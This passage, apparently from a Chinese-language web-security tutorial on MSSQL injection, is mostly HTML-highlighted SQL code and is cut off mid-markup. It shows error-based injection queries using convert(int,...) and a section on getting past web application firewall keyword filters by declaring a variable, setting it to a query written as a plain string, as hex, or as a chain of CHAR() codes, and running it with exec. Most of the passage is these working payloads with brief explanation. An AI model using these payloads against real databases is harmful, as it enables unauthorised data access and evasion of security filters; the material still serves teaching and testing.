style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">int</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">))</span></code></span></span></p></li>
    <li><p><br></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">select</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">*</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">from</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> admin </span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">where</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> id </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">=</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">1</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">select</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> convert</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">int</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">,</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">user</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">))</span></code></span></span></p></li>
   </ol>

0x01 简单绕过注入

因为在前面一章我已经写过一些简单的报错注入了,所以这里引进一个 declare 函数,他是mssql声明局部变量的函数,我们经常用它来绕过waf对一些关键词的拦截

   <ol class="linenums list-paddingleft-2" style="list-style-type: none;">
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">select</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">*</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">from</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> admin </span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">where</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> id </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">=</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">1</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">;</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">declare </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">@a</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> nvarchar</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">2000</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">)</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">set</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">@a</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">=</span><span class="str" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">'select convert(int,@@version)'</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">exec</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">@a</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">)</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">--</span></code></span></span></p></li>
   </ol>

declare定义变量 set设置变量值 exec执行变量

变量的值是支持hex和ascii码的,当过滤引号我们就可以这么用 把我们的语句编码一下

   <ol class="linenums list-paddingleft-2" style="list-style-type: none;">
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">select</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">*</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">from</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> admin </span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">where</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> id </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">=</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">1</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">;</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">declare </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">@s</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> varchar</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">2000</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">)</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">set</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">@s</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">=</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">0x73656c65637420636f6e7665727428696e742c404076657273696f6e29</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">exec</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">@s</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">)--</span></code></span></span></p></li>
    <li><p><br></p></li>
    <li><p><span style="box-sizing: border-box;color: rgb(51, 51, 51);display: block;line-height: 1.75em;font-size: 16px !important;word-break: inherit !important;"><span style="box-sizing: border-box;line-height: 1.75em;display: block;word-break: inherit !important;"><code style="box-sizing: border-box;margin-left: -20px;display: flex;overflow: initial;line-height: 12px;word-wrap: normal;border-width: 0px;border-style: initial;border-color: initial;font-size: 10px;font-family: inherit !important;white-space: pre !important;"><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">select</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">*</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">from</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> admin </span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">where</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> id </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">=</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">1</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">;</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">declare </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">@s</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> varchar</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">2000</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">)</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="kwd" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">set</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">@s</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">=</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> CHAR</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">115</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">)</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">+</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> CHAR</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">101</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">)</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">+</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> CHAR</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">108</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">)</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">+</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> CHAR</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">101</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">)</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">+</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> CHAR</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">99</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">)</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">+</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> CHAR</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">116</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">)</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">+</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> CHAR</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">32</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">)</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">+</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> CHAR</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">99</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">)</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">+</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> CHAR</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">111</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">)</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">+</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> CHAR</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">110</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">)</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">+</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> CHAR</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">118</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">)</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">+</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> CHAR</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">101</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">)</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">+</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> CHAR</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">114</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">)</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">+</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> CHAR</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">116</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">)</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">+</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> CHAR</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">40</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">)</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">+</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> CHAR</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">105</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">)</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">+</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> CHAR</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">110</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">)</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">+</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> CHAR</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">116</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">)</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">+</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> CHAR</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">44</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">)</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">+</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> CHAR</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">64</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">)</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">+</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> CHAR</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">64</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">)</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">+</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> CHAR</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">118</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">)</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">+</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> CHAR</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">101</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">)</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">+</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> CHAR</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">114</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">)</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">+</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> CHAR</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">115</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">)</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">+</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> CHAR</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">105</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">)</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">+</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> CHAR</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">111</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">)</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> </span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">+</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;"> CHAR</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">(</span><span class="lit" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">110</span><span class="pun" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: inherit !important;">)</span><span class="pln" style="box-sizing: border-box;line-height: 20px;font-size: 13px !important;white-space: 